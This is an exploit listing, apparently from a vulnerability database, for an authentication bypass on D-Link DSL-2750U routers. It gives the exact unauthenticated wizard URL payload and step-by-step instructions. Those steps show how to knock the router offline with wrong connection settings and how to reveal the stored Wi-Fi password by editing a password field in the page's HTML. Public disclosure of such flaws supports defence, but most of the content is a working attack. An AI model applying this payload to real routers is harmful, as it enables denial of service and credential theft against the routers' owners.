D-Link DSL-2750U Setup Wizard Page Authentication Bypass

2018-08-28 / 2018-09-17
Credit: Admin_JOKER
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○ • ██╗ ██╗███████╗ █████╗ ██████╗ ██████╗ • • ██║ ██║╚══███╔╝██╔══██╗██╔══██╗██╔══██╗ • • ██║ ██║ ███╔╝ ███████║██████╔╝██║ ██║ • • ██║ ██║ ███╔╝ ██╔══██║██╔══██╗██║ ██║ • • ███████╗██║███████╗██║ ██║██║ ██║██████╔╝ • • ╚══════╝╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ • • # Exploit Title: Setup Wizard Page Authentication Bypass {Denial Of Service & Information Leakage} • • # Exploit Author: Admin_JOKER • • # Email: Joker.Ktm314@gmail.com • • # Date: 2018-08-23 • • # Category: Webapps • • # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/ • • # Tesed on: DSL-2750U • • # Firmware Version: 1.11 / Work All Older Firmware • • # Video : https://youtu.be/BQQbp2vn_wY • ○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○ URL: http://[Router IP]/ Example URL : http://192.168.1.1 Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard Example Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard +-----------------------------------------------Setup Wizard Pages-----------------------------------------------------+ |Step 1: Set Time and Date (No matter) | |Step 2: Setup Internet Connection (Give wrong information >> Denial of Service) | |Step 3: Configure Wireless Network (Change Type="password" to Type="text" in html code >> Information Leakage) | |Step 4: Set Password (Skip this Step ) | |Step 5: Completed and Quit (Finish) | +----------------------------------------------------------------------------------------------------------------------+

References:

https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top